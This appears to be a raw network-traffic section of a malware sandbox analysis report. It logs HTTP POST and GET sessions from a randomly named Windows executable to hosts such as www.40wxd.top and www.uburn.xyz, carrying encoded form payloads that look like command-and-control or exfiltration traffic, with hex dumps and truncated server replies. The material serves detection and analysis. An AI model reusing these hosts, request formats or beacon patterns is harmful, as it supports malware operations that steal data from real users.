                                                                                                                    Location: http://newdaydawning.net/7mju/?rf-LZ=JlCtuN3HqPO8C&AHkx=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc4tgWVH2vgFrx7lu5caWGLmQTjS3LtG8lVAw=
                                                                                                                    Connection: close
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Oct 9, 2024 14:19:08.615659952 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.449355206.119.82.134803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:19:24.081482887 CEST710OUTPOST /l8if/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.40wxd.top
                                                                                                                    Origin: http://www.40wxd.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.40wxd.top/l8if/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6c 6b 56 43 71 6d 35 35 46 72 69 71 72 56 46 41 7a 6f 4c 6d 36 53 4f 4e 47 79 4d 77 54 52 53 30 69 44 4b 63 52 4b 56 6d 30 6c 49 4c 44 50 4d 46 6f 47 2f 33 64 71 4e 7a 52 4e 56 74 70 42 4b 45 6d 37 72 47 62 67 34 34 6e 32 52 53 6f 68 54 30 58 46 4f 77 71 44 6a 6f 54 65 72 65 4e 51 39 5a 63 41 6e 41 62 44 58 45 63 59 2f 46 52 6f 6d 68 72 63 4d 46 33 74 58 31 76 74 55 6d 52 4a 52 52 69 63 2f 69 69 59 32 42 34 62 4c 66 6f 71 38 54 78 5a 56 6d 33 65 68 72 35 77 39 31 46 5a 75 6b 70 45 30 31 65 59 72 46 79 50 31 58 56 68 43 51 64 5a 32 50 35 67 3d 3d
                                                                                                                    Data Ascii: AHkx=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm3ehr5w91FZukpE01eYrFyP1XVhCQdZ2P5g==
                                                                                                                    Oct 9, 2024 14:19:24.978863001 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:24 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.449367206.119.82.134803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:19:26.632097960 CEST730OUTPOST /l8if/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.40wxd.top
                                                                                                                    Origin: http://www.40wxd.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.40wxd.top/l8if/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6e 41 70 43 70 42 4e 35 43 4c 69 74 33 46 46 41 71 59 4b 74 36 54 79 4e 47 32 30 67 54 69 6d 30 69 6e 43 63 44 37 56 6d 33 6c 49 4c 62 2f 4d 36 6d 6d 2b 31 64 71 42 56 52 50 52 74 70 42 32 45 6d 35 7a 47 62 58 73 37 6d 6d 52 51 75 68 54 4d 4b 31 4f 77 71 44 6a 6f 54 61 48 30 4e 51 6c 5a 62 77 33 41 62 69 58 48 56 34 2f 47 51 6f 6d 68 76 63 4e 4f 33 74 58 74 76 73 49 49 52 4d 4e 52 69 65 6e 69 69 4e 61 65 79 62 4b 55 31 36 39 67 67 64 4d 69 78 50 4d 6a 36 51 31 74 45 49 32 50 6c 69 6c 76 50 70 4b 53 67 50 52 6b 49 6d 4c 6b 51 61 4c 47 69 68 5a 71 76 31 62 72 69 6a 5a 31 41 64 59 41 42 32 4d 30 31 78 6f 3d
                                                                                                                    Data Ascii: AHkx=SZf4ZXZLRuD8nApCpBN5CLit3FFAqYKt6TyNG20gTim0inCcD7Vm3lILb/M6mm+1dqBVRPRtpB2Em5zGbXs7mmRQuhTMK1OwqDjoTaH0NQlZbw3AbiXHV4/GQomhvcNO3tXtvsIIRMNRieniiNaeybKU169ggdMixPMj6Q1tEI2PlilvPpKSgPRkImLkQaLGihZqv1brijZ1AdYAB2M01xo=
                                                                                                                    Oct 9, 2024 14:19:27.506109953 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:27 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.449377206.119.82.134803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:19:29.175136089 CEST10812OUTPOST /l8if/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.40wxd.top
                                                                                                                    Origin: http://www.40wxd.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.40wxd.top/l8if/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6e 41 70 43 70 42 4e 35 43 4c 69 74 33 46 46 41 71 59 4b 74 36 54 79 4e 47 32 30 67 54 6a 65 30 69 77 43 63 52 6f 4e 6d 32 6c 49 4c 46 50 4d 2f 6d 6d 2b 30 64 75 74 5a 52 50 63 50 70 48 79 45 6e 63 6e 47 64 6c 55 37 73 6d 52 51 6a 42 54 33 58 46 4f 68 71 44 7a 6b 54 61 33 30 4e 51 6c 5a 62 32 7a 41 64 7a 58 48 54 34 2f 46 52 6f 6d 39 72 63 4e 6d 33 74 66 39 76 73 39 39 52 66 56 52 69 2b 33 69 67 2f 69 65 6f 62 4b 57 30 36 39 34 67 59 55 74 78 50 41 46 36 52 78 58 45 49 53 50 31 45 31 79 61 6f 58 4b 6b 4a 35 57 57 57 50 6b 58 4b 37 65 70 79 4d 56 75 45 6e 4b 67 41 6c 46 46 4f 4a 52 45 45 34 31 70 31 42 59 54 43 4e 71 35 39 47 59 78 62 4d 63 31 5a 31 6f 33 2b 6f 63 46 4e 4f 63 6a 6d 47 4c 30 69 37 67 4f 6e 37 69 6a 6f 68 42 5a 41 4a 46 7a 41 63 6c 59 31 72 58 35 32 46 4b 79 6e 76 51 6d 51 64 74 34 6a 4d 63 64 47 6b 73 6e 44 4b 63 34 53 2f 45 67 6b 4a 65 31 6d 33 33 72 78 64 63 2f 50 58 6a 45 59 4c 41 52 37 34 4f 4e 45 68 39 4a 69 47 6e 4b 61 36 58 54 [TRUNCATED]
                                                                                                                    Data Ascii: AHkx=SZf4ZXZLRuD8nApCpBN5CLit3FFAqYKt6TyNG20gTje0iwCcRoNm2lILFPM/mm+0dutZRPcPpHyEncnGdlU7smRQjBT3XFOhqDzkTa30NQlZb2zAdzXHT4/FRom9rcNm3tf9vs99RfVRi+3ig/ieobKW0694gYUtxPAF6RxXEISP1E1yaoXKkJ5WWWPkXK7epyMVuEnKgAlFFOJREE41p1BYTCNq59GYxbMc1Z1o3+ocFNOcjmGL0i7gOn7ijohBZAJFzAclY1rX52FKynvQmQdt4jMcdGksnDKc4S/EgkJe1m33rxdc/PXjEYLAR74ONEh9JiGnKa6XT7f7SSb0BplAF7XRei7lr4idmh5+4kLUsJ8TlpCseymrJEwRLeWjIo3v621WKkcd7p7h3h4EtybZbp8Xhw7xmd9K8Z4mj+zQU+/23QAbhGYnDDszksjbFEz0O5t6rIinDH4FDMv20wVMkNj+9JeycTeLN7rVAduZ5k2UcMYv/X3iAux6Hg6LPC4pJA1hCoa/Q0ilX0/6Bef2hqaAzNXSLsKaTcvqgD1OCWWK1/bcYFWDU9WyaUEZiJPVINPSNNeTW/9ZjERrpEb6XY6X+MxPcI8jq3+pwf4GQudZj/l7fhWDNMTZCVZx+WFXN8xe/X60reFoYRg158chviE/GQhDsU20A7S4Lu7FKrvm3KuD05PgaaqrT8OW5/ZBhbOPV3ony969SlXYk2EKeRYbU2+Ay5141ST3Jl11V7n5rlGroiYg4KENNjj/OkMRneYa/ZWxRA2vMauLYmUQMj2S7Wg9Q9JQ0u9b+r6kzXrwKlaIZ8f1jwv1vIesQm61WODnAdiTz/2OY504wAe4kFiAzvwNyMcGJHUeF3hZVgOb33I0IT6pS6/LhTt/zEL8tBmzE1zXlhc5AhJuBSXmbpekg27gUgIiwSnP0P6nt8uBILeLidWiHrflvSk99kIn/9j9IRXfh5S2EaQe7/PR7GZ0eBDRacPWfulX7KgtIKm [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:19:30.080307007 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.449390206.119.82.134803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:19:31.716711044 CEST459OUTGET /l8if/?AHkx=fb3YagVOau/9jH9JrwpuHsbxrllxr9uMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0IvhyZ1jg35IXHzinqtRNXlFD8GamKybSzcUs8=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.40wxd.top
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:19:32.618989944 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:32 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.44942367.223.117.189803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:19:38.637706041 CEST710OUTPOST /iqqs/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.uburn.xyz
                                                                                                                    Origin: http://www.uburn.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.uburn.xyz/iqqs/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 61 39 73 50 4f 57 2f 74 73 77 74 6e 74 73 4b 42 7a 32 69 32 64 4b 4a 2f 69 63 41 54 41 50 57 4f 70 57 72 30 68 68 74 39 66 70 6f 4c 4d 68 53 68 79 65 64 4d 7a 63 59 65 61 42 77 46 64 7a 4d 31 50 41 66 44 51 4b 50 6d 78 53 79 7a 5a 6a 33 68 67 6e 69 43 72 2b 42 41 34 54 74 61 47 70 45 67 31 4f 55 6b 4e 68 55 45 56 43 74 6f 68 6e 5a 2b 30 50 71 4d 68 30 31 4f 39 61 4b 51 34 77 72 44 68 4d 45 6d 4f 38 64 44 6f 44 70 59 6e 33 79 39 70 55 36 76 30 50 4d 6f 54 30 72 63 61 41 4f 77 67 70 52 53 77 37 63 6b 58 7a 33 74 6c 75 75 6a 74 59 4e 4e 67 3d 3d
                                                                                                                    Data Ascii: AHkx=S5nO3ybs7ms6Ta9sPOW/tswtntsKBz2i2dKJ/icATAPWOpWr0hht9fpoLMhShyedMzcYeaBwFdzM1PAfDQKPmxSyzZj3hgniCr+BA4TtaGpEg1OUkNhUEVCtohnZ+0PqMh01O9aKQ4wrDhMEmO8dDoDpYn3y9pU6v0PMoT0rcaAOwgpRSw7ckXz3tluujtYNNg==
                                                                                                                    Oct 9, 2024 14:19:39.233439922 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:39 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 32106
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:19:39.233467102 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                                                                                    Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                                                                                    Oct 9, 2024 14:19:39.233479023 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                                                                                    Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                                                                                    Oct 9, 2024 14:19:39.233489037 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                                                                                                    Oct 9, 2024 14:19:39.233500004 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                                                                                                                    Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
                                                                                                                    Oct 9, 2024 14:19:39.233510971 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 6f 6d 65 32 2e 68 74 6d 6c 22 3e 48 6f 6d 65 20 32 3c 2f 61 3e 3c 2f
                                                                                                                    Data Ascii: <li><a class="dropdown-item" href="home2.html">Home 2</a></li> <li><a class="dropdown-item" href="home3.html">Home 3</a></li> <li><a
                                                                                                                    Oct 9, 2024 14:19:39.233521938 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 31 2d 74 72 61 6e 73 70 61 72 65 6e 74
                                                                                                                    Data Ascii: <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a class="dropdown-item" href="header1-light.html">Header 1
                                                                                                                    Oct 9, 2024 14:19:39.233618021 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: </ul> </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a>
                                                                                                                    Oct 9, 2024 14:19:39.233628035 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 6c 69 67
                                                                                                                    Data Ascii: <li><a class="dropdown-item" href="header4-light.html">Header 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark<
                                                                                                                    Oct 9, 2024 14:19:39.233639002 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65
                                                                                                                    Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Footers</a> <ul class="dropdown-menu"> <li><a class="
                                                                                                                    Oct 9, 2024 14:19:39.238456964 CEST1236INData Raw: 6c 22 3e 46 6f 6f 74 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: l">Footer 2 Transparent</a></li> <li><a class="dropdown-item" href="footer2-light.html">Footer 2 Light</a></li> <li><a clas


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.44943767.223.117.189803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:19:41.188683987 CEST730OUTPOST /iqqs/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.uburn.xyz
                                                                                                                    Origin: http://www.uburn.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.uburn.xyz/iqqs/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
